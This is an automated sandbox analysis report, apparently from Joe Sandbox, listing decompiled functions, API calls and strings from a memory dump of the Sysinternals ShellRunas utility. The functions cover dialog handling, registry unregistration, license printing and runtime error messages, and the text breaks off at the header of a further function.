Instruction ID: 348cd96654d2abbfe703da2164321630b7e188129bd778ae1d25fea451b48038
Opcode Fuzzy Hash: fb7a9b76fc0a125024f92bf21f90df84a81b0ed7226d44e92ef0621ef33c86bd
Instruction Fuzzy Hash: E981AD71508200AFD320EF58C988D6FB7E9AFC8704F144A6DF549E7290D6B8ED45CBA6

Uniqueness

Uniqueness Score: -1.00%

Function 00407219 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00407219() {

				SetUnhandledExceptionFilter(E004071DC);
				return 0;
			}

0x0040721e
0x00407226

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_000071DC), ref: 0040721E

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 60dce524007cd36b1afbdad1174eb971ab13da7a47c5473fb774a753f846e0e8
Instruction ID: 4a2c546b5ce0fac6330c053a0bce39fcca3f6a47db525e6d2e0361f563a01c8d
Opcode Fuzzy Hash: 60dce524007cd36b1afbdad1174eb971ab13da7a47c5473fb774a753f846e0e8
Instruction Fuzzy Hash: 489002B0A651044EC6001FB05D0950535905A896127514871A401FC1D4EE7454449D6A

Uniqueness

Uniqueness Score: -1.00%

Function 00401D50 Relevance: 58.0, APIs: 28, Strings: 5, Instructions: 213
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E00401D50(void* __fp0, struct HWND__* _a4, int _a8, int _a12, long _a16) {
				signed int _v8;
				signed int _v28;
				signed int _v32;
				short _v552;
				struct tagLOGFONTW _v644;
				int _v652;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t21;
				int _t23;
				void* _t24;
				struct HWND__* _t27;
				int _t28;
				long _t30;
				void* _t42;
				struct HBRUSH__* _t44;
				void* _t47;
				void* _t49;
				void* _t50;
				int _t74;
				void* _t75;
				void* _t76;
				int _t77;
				void* _t79;
				struct HWND__* _t81;
				void* _t92;
				struct HWND__* _t101;
				void* _t102;
				void* _t103;
				void* _t104;
				long _t106;
				void* _t107;
				void* _t109;
				void* _t112;
				signed int _t113;
				void* _t119;

				_t115 = (_t113 & 0xfffffff8) - 0x274;
				_t21 =  *0x413004; // 0xf284055d
				_v8 = _t21 ^ (_t113 & 0xfffffff8) - 0x00000274;
				_t23 = _a8;
				_t119 = _t23 - 0x138;
				_t74 = _a12;
				_t106 = _a16;
				_t101 = _a4;
				if(_t119 > 0) {
					_t24 = _t23 - 0x200;
					if(_t24 == 0) {
						_push(_t106 >> 0x10);
						_t27 = ChildWindowFromPoint(_t101, _t106 & 0x0000ffff);
						_t81 =  *0x414aa4;
						_t28 =  *0x414aa8;
						if(_t28 == (0 | _t27 == _t81)) {
							 *0x414aa8 = 0 | _t28 == 0x00000000;
							InvalidateRect(_t81, 0, 0);
							_t28 =  *0x414aa8;
						}
						if(_t28 == 0) {
							SetCursor( *0x414a9c);
						} else {
							SetCursor( *0x414aa0);
						}
					} else {
						if(_t24 == 2) {
							_push(_t106 >> 0x10);
							if(ChildWindowFromPoint(_t101, _t106 & 0x0000ffff) ==  *0x414aa4) {
								ShellExecuteW(_t101, L"open", L"http://www.sysinternals.com", 0, 0, 1);
							}
						}
					}
					goto L25;
				} else {
					if(_t119 == 0) {
						if(_t106 !=  *0x414aa4) {
							goto L25;
						} else {
							SetBkMode(_t74, 1);
							if(GetSysColorBrush(0x1a) == 0) {
								_push(0xff0000);
							} else {
								_push(GetSysColor(0x1a));
							}
							SetTextColor(_t74, ??);
							_t42 =  *0x414a98;
							if( *0x414aa8 == 0) {
								_t42 =  *0x414a94;
							}
							SelectObject(_t74, _t42);
							_t44 = GetSysColorBrush(0xf);
							_pop(_t103);
							_pop(_t109);
							_pop(_t76);
							return E0040318A(_t44, _t76, _v32 ^ _t115, _t92, _t103, _t109);
						}
					} else {
						_t47 = _t23 - 0x10;
						if(_t47 == 0) {
							L6:
							EndDialog(_t101, 0);
							PostQuitMessage(0);
							goto L25;
						} else {
							_t49 = _t47 - 0x100;
							if(_t49 == 0) {
								_t50 = GetStockObject(0x11);
								 *0x414a94 = _t50;
								GetObjectW(_t50, 0x5c,  &(_v644.lfOrientation));
								_v644.lfUnderline = 1;
								 *0x414a98 = CreateFontIndirectW( &_v644);
								 *0x414aa8 = 1;
								 *0x414aa4 = GetDlgItem(_t101, 0x40a);
								GetModuleFileNameW(0,  &_v552, 0x208);
								_t77 = GetFileVersionInfoSizeW( &_v552,  &_v652);
								GetFileVersionInfoW( &_v552, 0, _t77, E0040354A(_t77));
								SetDlgItemTextW(_t101, 0x46c, E00401D00(_t57, L"FileVersion"));
								SetDlgItemTextW(_t101, 0x46b, E00401D00(_t57, L"LegalCopyright"));
								 *0x414a9c = LoadCursorW(GetModuleHandleW(0), L"HAND");
								 *0x414aa0 = LoadCursorW(0, 0x7f00);
								ShowWindow(_t101, 5);
								_pop(_t104);
								_pop(_t112);
								_pop(_t79);
								return E0040318A(1, _t79, _v28 ^ _t115 + 0xc,  &_v552, _t104, _t112);
							} else {
								if(_t49 == 1 && (_t74 & 0x0000ffff) + 0xffffffff <= 1) {
									goto L6;
								}
								L25:
								_t30 = DefWindowProcW(_t101, _a8, _t74, _t106);
								_pop(_t102);
								_pop(_t107);
								_pop(_t75);
								return E0040318A(_t30, _t75, _v8 ^ _t115, _a8, _t102, _t107);
							}
						}
					}
				}
			}

0x00401d56
0x00401d5c
0x00401d63
0x00401d6a
0x00401d6d
0x00401d73
0x00401d77
0x00401d7b
0x00401d7e
0x00401f3b
0x00401f40
0x00401f85
0x00401f88
0x00401f8e
0x00401f98
0x00401fa2
0x00401fb0
0x00401fb6
0x00401fbc
0x00401fbc
0x00401fc3
0x00401fd4
0x00401fc5
0x00401fd4
0x00401fd4
0x00401f42
0x00401f45
0x00401f53
0x00401f62
0x00401f75
0x00401f75
0x00401f62
0x00401f45
0x00000000
0x00401d84
0x00401d84
0x00401ed1
0x00000000
0x00401ed7
0x00401eda
0x00401eec
0x00401ef9
0x00401eee
0x00401ef6
0x00401ef6
0x00401eff
0x00401f0c
0x00401f11
0x00401f13
0x00401f13
0x00401f1a
0x00401f22
0x00401f24
0x00401f25
0x00401f26
0x00401f38
0x00401f38
0x00401d8a
0x00401d8a
0x00401d8d
0x00401dae
0x00401db1
0x00401db9
0x00000000
0x00401d8f
0x00401d8f
0x00401d94
0x00401dc6
0x00401dd4
0x00401dd9
0x00401de4
0x00401df5
0x00401dfa
0x00401e0a
0x00401e1b
0x00401e30
0x00401e46
0x00401e65
0x00401e7b
0x00401e9a
0x00401ea4
0x00401ea9
0x00401eb4
0x00401eb5
0x00401eb6
0x00401ec8
0x00401d96
0x00401d99
0x00000000
0x00000000
0x00401fda
0x00401fe1
0x00401fee
0x00401fef
0x00401ff0
0x00401ffb
0x00401ffb
0x00401d94
0x00401d8d
0x00401d84

APIs

EndDialog.USER32(?,00000000), ref: 00401DB1
PostQuitMessage.USER32(00000000), ref: 00401DB9
GetStockObject.GDI32(00000011), ref: 00401DC6
GetObjectW.GDI32(00000000,0000005C,?), ref: 00401DD9
CreateFontIndirectW.GDI32 ref: 00401DE9
GetDlgItem.USER32 ref: 00401E04
GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,?,?,?), ref: 00401E1B
GetFileVersionInfoSizeW.VERSION(?,?,?,?,?,?,?,?,?,?), ref: 00401E2B
_malloc.LIBCMT ref: 00401E33
GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000), ref: 00401E46
SetDlgItemTextW.USER32 ref: 00401E65
SetDlgItemTextW.USER32 ref: 00401E7B
GetModuleHandleW.KERNEL32(00000000,HAND), ref: 00401E84
LoadCursorW.USER32(00000000), ref: 00401E91
LoadCursorW.USER32(00000000,00007F00), ref: 00401E9F
ShowWindow.USER32(?,00000005), ref: 00401EA9
SetBkMode.GDI32(?,00000001), ref: 00401EDA
GetSysColorBrush.USER32(0000001A), ref: 00401EE8
GetSysColor.USER32(0000001A), ref: 00401EF0
SetTextColor.GDI32(?,00FF0000), ref: 00401EFF
SelectObject.GDI32(?,?), ref: 00401F1A
GetSysColorBrush.USER32(0000000F), ref: 00401F22
ChildWindowFromPoint.USER32 ref: 00401F56
ShellExecuteW.SHELL32(?,open,http://www.sysinternals.com,00000000,00000000,00000001), ref: 00401F75
ChildWindowFromPoint.USER32 ref: 00401F88
InvalidateRect.USER32(?,00000000,00000000,?,?), ref: 00401FB6
SetCursor.USER32(?,?,?), ref: 00401FD4
DefWindowProcW.USER32(?,?,?,?,?,?), ref: 00401FE1

Strings

FileVersion, xrefs: 00401E4B
http://www.sysinternals.com, xrefs: 00401F6A
HAND, xrefs: 00401E7D
open, xrefs: 00401F6F
LegalCopyright, xrefs: 00401E67

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: ColorWindow$CursorFileItemObjectText$BrushChildFromInfoLoadModulePointVersion$CreateDialogExecuteFontHandleIndirectInvalidateMessageModeNamePostProcQuitRectSelectShellShowSizeStock_malloc
String ID: FileVersion$HAND$LegalCopyright$http://www.sysinternals.com$open
API String ID: 3345172160-4191033705
Opcode ID: 2f602c52077be3eec7b50e33d563c06f28bb8856962e059969dcbe1c2fda3ebc
Instruction ID: e26033b52e4dbe09ff1a83e59bdc46354e0d09b5a075afc51df58c3e83d68215
Opcode Fuzzy Hash: 2f602c52077be3eec7b50e33d563c06f28bb8856962e059969dcbe1c2fda3ebc
Instruction Fuzzy Hash: FC61D771640201AFE7109FA5ED89FBB37A8EF88741F11853AF509F61E1CB7898058B6D

Uniqueness

Uniqueness Score: -1.00%

Function 00401930 Relevance: 47.3, APIs: 13, Strings: 14, Instructions: 48
registrywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00401930(char _a4) {

				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user...\\Command");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user...");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user (netonly)...\\Command");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.exe\\Shell\\Run as different user (netonly)...");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user...\\Command");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user...");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user (netonly)...\\Command");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\lnkfile\\Shell\\Run as different user (netonly)...");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user...\\Command");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user...");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user (netonly)...\\Command");
				RegDeleteKeyW(0x80000001, L"Software\\Classes\\SystemFileAssociations\\.msc\\Shell\\Run as different user (netonly)...");
				if(_a4 != 0) {
					MessageBoxW(0, L"ShellRunas context menu handler unregistered.", L"ShellRunas - Sysinternals: www.sysinternals.com", 0x40);
				}
				return 0;
			}

0x00401941
0x0040194d
0x00401959
0x00401965
0x00401971
0x0040197d
0x00401989
0x00401995
0x004019a1
0x004019ad
0x004019b9
0x004019c5
0x004019cd
0x004019dd
0x004019dd
0x004019e5

APIs

RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...\Command), ref: 00401941
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...), ref: 0040194D
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...\Command), ref: 00401959
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...), ref: 00401965
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user...\Command), ref: 00401971
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user...), ref: 0040197D
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user (netonly)...\Command), ref: 00401989
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\lnkfile\Shell\Run as different user (netonly)...), ref: 00401995
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...\Command), ref: 004019A1
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...), ref: 004019AD
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...\Command), ref: 004019B9
RegDeleteKeyW.ADVAPI32(80000001,Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...), ref: 004019C5
MessageBoxW.USER32(00000000,ShellRunas context menu handler unregistered.,ShellRunas - Sysinternals: www.sysinternals.com,00000040), ref: 004019DD

Strings

Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...\Command, xrefs: 00401997
Software\Classes\lnkfile\Shell\Run as different user (netonly)...\Command, xrefs: 0040197F
ShellRunas - Sysinternals: www.sysinternals.com, xrefs: 004019D1
Software\Classes\lnkfile\Shell\Run as different user..., xrefs: 00401973
Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)..., xrefs: 0040195B
Software\Classes\lnkfile\Shell\Run as different user...\Command, xrefs: 00401967
Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user..., xrefs: 00401943
ShellRunas context menu handler unregistered., xrefs: 004019D6
Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)..., xrefs: 004019BB
Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user..., xrefs: 004019A3
Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...\Command, xrefs: 00401937
Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...\Command, xrefs: 004019AF
Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...\Command, xrefs: 0040194F
Software\Classes\lnkfile\Shell\Run as different user (netonly)..., xrefs: 0040198B

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: Delete$Message
String ID: ShellRunas - Sysinternals: www.sysinternals.com$ShellRunas context menu handler unregistered.$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user (netonly)...\Command$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...$Software\Classes\SystemFileAssociations\.exe\Shell\Run as different user...\Command$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user (netonly)...\Command$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...$Software\Classes\SystemFileAssociations\.msc\Shell\Run as different user...\Command$Software\Classes\lnkfile\Shell\Run as different user (netonly)...$Software\Classes\lnkfile\Shell\Run as different user (netonly)...\Command$Software\Classes\lnkfile\Shell\Run as different user...$Software\Classes\lnkfile\Shell\Run as different user...\Command
API String ID: 3870238891-4209861522
Opcode ID: 740cf35f253191141593886196fbd27c721ca799f3015d695be5faa3ca5f58ce
Instruction ID: 5da64dfe4fce38312f7ee7f6f0bbc387e0a5c92d836bb648faa7c577a003e90f
Opcode Fuzzy Hash: 740cf35f253191141593886196fbd27c721ca799f3015d695be5faa3ca5f58ce
Instruction Fuzzy Hash: EFF03F70AD5328B9E26023E25D0BFDA7D40CB24BA6F30011B7B4C3509249EA21E5C9EE

Uniqueness

Uniqueness Score: -1.00%

Function 00401000 Relevance: 43.9, APIs: 23, Strings: 2, Instructions: 165
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E00401000(struct HWND__* __edi, void* __eflags) {
				struct HINSTANCE__* _v42;
				intOrPtr _v56;
				struct HDC__* _v60;
				struct HDC__* _v68;
				struct HWND__* _v72;
				struct tagPD _v76;
				struct HDC__* _v84;
				struct HDC__* _v92;
				struct HDC__* _v100;
				struct HDC__* _v108;
				struct HDC__* _v112;
				struct HDC__* _v116;
				struct _DOCINFOW _v136;
				intOrPtr _v140;
				int _v144;
				signed int _v148;
				struct HICON__* _v152;
				long _v156;
				long _v160;
				struct tagRECT _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				signed int _v188;
				void* _v196;
				void* _v204;
				struct HICON__* _v212;
				intOrPtr _v220;
				int _t69;
				signed int _t72;
				signed int _t76;
				struct HDC__* _t81;
				signed int _t87;
				signed int _t114;
				struct HWND__* _t128;
				long _t132;

				_t128 = __edi;
				E00409280(__edi,  &_v72, 0, 0x3e);
				_v76 = 0x42;
				_v72 = _t128;
				_v42 = GetModuleHandleW(0);
				_v56 = 0x14c;
				_t69 = PrintDlgW( &_v76);
				if(_t69 != 0) {
					_v152 = SetCursor(LoadCursorW(0, 0x7f02));
					_t72 = GetDeviceCaps(_v60, 8);
					_v176.top = GetDeviceCaps(_v68, 0xa);
					_v176.top = GetDeviceCaps(_v76, 0x58);
					_t76 = GetDeviceCaps(_v84, 0x5a);
					_v176.left = 0;
					E00409280(_t128,  &(_v176.top), 0, 0x2c);
					_v136.lpszOutput = 0;
					_v136.lpszDatatype = 0;
					_v136.fwType = 0;
					_v116 = 0;
					_v112 = 0;
					SetMapMode(_v92, 1);
					_t81 = _v100;
					_v184 = _t81;
					_v180 = _t81;
					_v156 = 0;
					_v160 = 0;
					asm("cdq");
					_t114 = _v196 / _t76 * 0x5a0;
					asm("cdq");
					_v176.left = _v160;
					_v148 = _t114;
					_v176.top = _v156;
					_v176.bottom = _t114;
					_t87 = _t72 / _v188 * 0x5a0;
					_v152 = _t87;
					_v176.right = _t87;
					InflateRect( &_v176, 0xfffffa60, 0xfffffa60);
					_v144 = 0;
					_v140 = 0xffffffff;
					_v136.cbSize = 0x14;
					_v136.lpszDocName = L"Sysinternals License";
					StartDocW(_v100,  &_v136);
					_v204 = SendMessageW(_t128, 0xe, 0, 0);
					StartPage(_v108);
					_t132 = SendMessageW(_t128, 0x439, 1,  &_v196);
					EndPage(_v112);
					if(_t132 < _v212) {
						do {
							_v160 = _t132;
							_v156 = 0xffffffff;
							StartPage(_v116);
							_t132 = SendMessageW(_t128, 0x439, 1,  &_v204);
							EndPage(_v136.fwType);
						} while (_t132 < _v220);
					}
					SendMessageW(_t128, 0x439, 0, 0);
					EndDoc(_v116);
					SetCursor(_v212);
					return 1;
				} else {
					return _t69;
				}
			}

0x00401000
0x00401017
0x00401021
0x00401029
0x00401038
0x0040103c
0x00401044
0x0040104c
0x00401075
0x00401079
0x0040108d
0x0040109a
0x0040109e
0x004010ab
0x004010b3
0x004010c4
0x004010c8
0x004010cc
0x004010d0
0x004010d4
0x004010d8
0x004010de
0x004010e2
0x004010e6
0x004010ec
0x004010f0
0x004010f8
0x00401109
0x0040110f
0x00401118
0x00401120
0x00401124
0x00401128
0x0040112c
0x00401132
0x00401136
0x0040113f
0x0040114f
0x00401157
0x0040115f
0x00401167
0x0040116f
0x00401184
0x0040118d
0x004011a7
0x004011a9
0x004011b3
0x004011b5
0x004011ba
0x004011be
0x004011c6
0x004011e0
0x004011e2
0x004011e8
0x004011b5
0x004011f8
0x004011ff
0x0040120a
0x0040121a
0x0040104e
0x00401053
0x00401053

APIs

_memset.LIBCMT ref: 00401017
GetModuleHandleW.KERNEL32 ref: 0040102D
PrintDlgW.COMDLG32(?,?,?,?,?), ref: 00401044
LoadCursorW.USER32(00000000,00007F02), ref: 0040105B
SetCursor.USER32(00000000,?,?,?,?,?), ref: 00401062
GetDeviceCaps.GDI32(?,00000008), ref: 00401079
GetDeviceCaps.GDI32(?,0000000A), ref: 00401084
GetDeviceCaps.GDI32(?,00000058), ref: 00401091
GetDeviceCaps.GDI32(?,0000005A), ref: 0040109E
_memset.LIBCMT ref: 004010B3
SetMapMode.GDI32(?,00000001), ref: 004010D8
InflateRect.USER32(?,?,FFFFFA60), ref: 0040113F
StartDocW.GDI32 ref: 0040116F
SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00401182
StartPage.GDI32(?), ref: 0040118D
SendMessageW.USER32(?,00000439,00000001,?), ref: 004011A0

Strings

Sysinternals License, xrefs: 00401167
B, xrefs: 00401021

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: CapsDevice$CursorMessageSendStart_memset$HandleInflateLoadModeModulePagePrintRect
String ID: B$Sysinternals License
API String ID: 2038973732-3449285610
Opcode ID: 50c78a9c205daa766ea62d1cb0deeee4e7ab09cc65df2377fcb9ff908164596a
Instruction ID: bdae98e849ea38a2b48d3d89d57636c7b0b180fdbc1935bf1a89306988cad38c
Opcode Fuzzy Hash: 50c78a9c205daa766ea62d1cb0deeee4e7ab09cc65df2377fcb9ff908164596a
Instruction Fuzzy Hash: 16512EB1A48300AFD310DFA9DD45B5BBBE4BB88714F004A2DF689E72A0D774D845CB96

Uniqueness

Uniqueness Score: -1.00%

Function 00406CE5 Relevance: 38.7, APIs: 15, Strings: 7, Instructions: 156
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 61%

			E00406CE5(void* __edx, void* __fp0, intOrPtr _a4) {
				long _v4;
				void* __ebx;
				void* __ecx;
				void* __edi;
				void* __ebp;
				void* _t9;
				int _t11;
				void* _t14;
				void* _t16;
				void* _t18;
				void* _t19;
				void* _t24;
				void* _t26;
				intOrPtr _t30;
				void* _t34;
				void* _t37;
				signed int _t38;
				void** _t40;
				void* _t42;
				void* _t44;
				void* _t45;
				void* _t48;
				void* _t49;
				void* _t50;
				void* _t51;
				void* _t69;

				_t69 = __fp0;
				_t37 = __edx;
				_t30 = _a4;
				_t38 = 0;
				while(_t30 !=  *((intOrPtr*)(0x4138d0 + _t38 * 8))) {
					_t38 = _t38 + 1;
					if(_t38 < 0x17) {
						continue;
					}
					break;
				}
				if(_t38 >= 0x17) {
					return _t9;
				}
				_push(_t44);
				if(E0040B0DD(_t44, _t69, 3) == 1) {
					L22:
					_t11 = GetStdHandle(0xfffffff4);
					_t45 = _t11;
					if(_t45 != 0 && _t45 != 0xffffffff) {
						_t40 = 0x4138d4 + _t38 * 8;
						_t11 = WriteFile(_t45,  *_t40, E00408FE0( *_t40),  &_v4, 0);
					}
					L25:
					return _t11;
				}
				_t11 = E0040B0DD(_t44, _t69, 3);
				_pop(_t34);
				if(_t11 != 0 ||  *0x413000 != 1) {
					if(_t30 == 0xfc) {
						goto L25;
					}
					_t14 = E0040A659(_t37, 0x414548, _t69, 0x414548, 0x314, "Runtime Error!\n\nProgram: ");
					_t49 = _t48 + 0xc;
					if(_t14 != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00405700(0x314, _t34, _t37, _t38);
						_t49 = _t49 + 0x14;
					}
					 *0x414665 = 0;
					if(GetModuleFileNameA(0, 0x414561, 0x104) == 0) {
						_t26 = E0040A659(_t37, 0x414548, _t69, 0x414561, 0x2fb, "<program name unknown>");
						_t49 = _t49 + 0xc;
						if(_t26 != 0) {
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							E00405700(0x314, _t34, _t37, _t38);
							_t49 = _t49 + 0x14;
						}
					}
					_t16 = E00408FE0(0x414561);
					_pop(_t35);
					if(_t16 + 1 <= 0x3c) {
						L16:
						_t42 = 0;
						goto L17;
					} else {
						_t23 = E00408FE0(0x414561) + 0x414526;
						_t35 = 0x41485c - E00408FE0(0x414561) + 0x414526;
						_t24 = E0040A5A6(_t37, _t69, _t23, 0x41485c - E00408FE0(0x414561) + 0x414526, "...", 3);
						_t49 = _t49 + 0x14;
						if(_t24 == 0) {
							goto L16;
						}
						_t42 = 0;
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E00405700(0x314, _t35, _t37, _t38);
						_t49 = _t49 + 0x14;
						L17:
						_t18 = E0040A4E5(_t37, 0x414548, _t69, 0x414548, 0x314, "\n\n");
						_t50 = _t49 + 0xc;
						if(_t18 != 0) {
							_push(_t42);
							_push(_t42);
							_push(_t42);
							_push(_t42);
							_push(_t42);
							E00405700(0x314, _t35, _t37, _t38);
							_t50 = _t50 + 0x14;
						}
						_t19 = E0040A4E5(_t37, 0x414548, _t69, 0x414548, 0x314,  *(0x4138d4 + _t38 * 8));
						_t51 = _t50 + 0xc;
						if(_t19 != 0) {
							_push(_t42);
							_push(_t42);
							_push(_t42);
							_push(_t42);
							_push(_t42);
							E00405700(0x314, _t35, _t37, _t38);
							_t51 = _t51 + 0x14;
						}
						_t11 = E0040AF20(_t37, _t69, 0x414548, "Microsoft Visual C++ Runtime Library", 0x12010);
						goto L25;
					}
				} else {
					goto L22;
				}
			}

0x00406ce5
0x00406ce5
0x00406ce7
0x00406cef
0x00406cf1
0x00406cfa
0x00406cfe
0x00000000
0x00000000
0x00000000
0x00406cfe
0x00406d03
0x00406e84
0x00406e84
0x00406d09
0x00406d15
0x00406e4c
0x00406e4e
0x00406e54
0x00406e58
0x00406e66
0x00406e79
0x00406e79
0x00406e7f
0x00000000
0x00406e7f
0x00406d1d
0x00406d24
0x00406d25
0x00406d3a
0x00000000
0x00000000
0x00406d51
0x00406d56
0x00406d5b
0x00406d5d
0x00406d5e
0x00406d5f
0x00406d60
0x00406d61
0x00406d62
0x00406d67
0x00406d67
0x00406d77
0x00406d86
0x00406d93
0x00406d98
0x00406d9d
0x00406da1
0x00406da2
0x00406da3
0x00406da4
0x00406da5
0x00406da6
0x00406dab
0x00406dab
0x00406d9d
0x00406daf
0x00406db8
0x00406db9
0x00406df3
0x00406df3
0x00000000
0x00406dbb
0x00406dc4
0x00406dd2
0x00406dd6
0x00406ddb
0x00406de0
0x00000000
0x00000000
0x00406de2
0x00406de4
0x00406de5
0x00406de6
0x00406de7
0x00406de8
0x00406de9
0x00406dee
0x00406df5
0x00406dfc
0x00406e01
0x00406e06
0x00406e08
0x00406e09
0x00406e0a
0x00406e0b
0x00406e0c
0x00406e0d
0x00406e12
0x00406e12
0x00406e1e
0x00406e23
0x00406e28
0x00406e2a
0x00406e2b
0x00406e2c
0x00406e2d
0x00406e2e
0x00406e2f
0x00406e34
0x00406e34
0x00406e42
0x00000000
0x00406e47
0x00000000
0x00000000
0x00000000

APIs

_strcpy_s.LIBCMT ref: 00406D51
__invoke_watson.LIBCMT ref: 00406D62
GetModuleFileNameA.KERNEL32(00000000,00414561,00000104), ref: 00406D7E
_strcpy_s.LIBCMT ref: 00406D93
__invoke_watson.LIBCMT ref: 00406DA6
_strlen.LIBCMT ref: 00406DAF
_strlen.LIBCMT ref: 00406DBC
__invoke_watson.LIBCMT ref: 00406DE9
_strcat_s.LIBCMT ref: 00406DFC
__invoke_watson.LIBCMT ref: 00406E0D
_strcat_s.LIBCMT ref: 00406E1E
__invoke_watson.LIBCMT ref: 00406E2F
GetStdHandle.KERNEL32(000000F4,?,?,00000000,77D74620,00000003,00406EB1,000000FC,00403572,?,?,00000000,?,00401E38,00000000,?), ref: 00406E4E
_strlen.LIBCMT ref: 00406E6F
WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,00401E38,00000000,?,?), ref: 00406E79

Strings

HEA, xrefs: 00406D4B
Microsoft Visual C++ Runtime Library, xrefs: 00406E3C
..., xrefs: 00406DCD
\HA, xrefs: 00406DC8
<program name unknown>, xrefs: 00406D88
aEA, xrefs: 00406D6F
Runtime Error!Program: , xrefs: 00406D40

Memory Dump Source

Source File: 00000002.00000002.492840110.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_jsc.jbxd

Similarity

API ID: __invoke_watson$_strlen$File_strcat_s_strcpy_s$HandleModuleNameWrite
String ID: ...$<program name unknown>$HEA$Microsoft Visual C++ Runtime Library$Runtime Error!Program: $\HA$aEA
API String ID: 1879448924-3572076021
Opcode ID: d3af22cc10ca9b44eb9083e57a25194163f1f7ec8eb41c9ad0b68adc3b984521
Instruction ID: b7283139e289806ab696c21597f2b912ea31a9b8ad5217b72df3c15dadb4aa87
Opcode Fuzzy Hash: d3af22cc10ca9b44eb9083e57a25194163f1f7ec8eb41c9ad0b68adc3b984521
Instruction Fuzzy Hash: 133118B6A003116AE6203375DC0AF6B364D9B61759F16013BFD4AB12C3EE7D892581FE

Uniqueness

Uniqueness Score: -1.00%

Function 00401470 Relevance: 35.2, APIs: 9, Strings: 11, Instructions: 242
registrymemorylibraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 88%

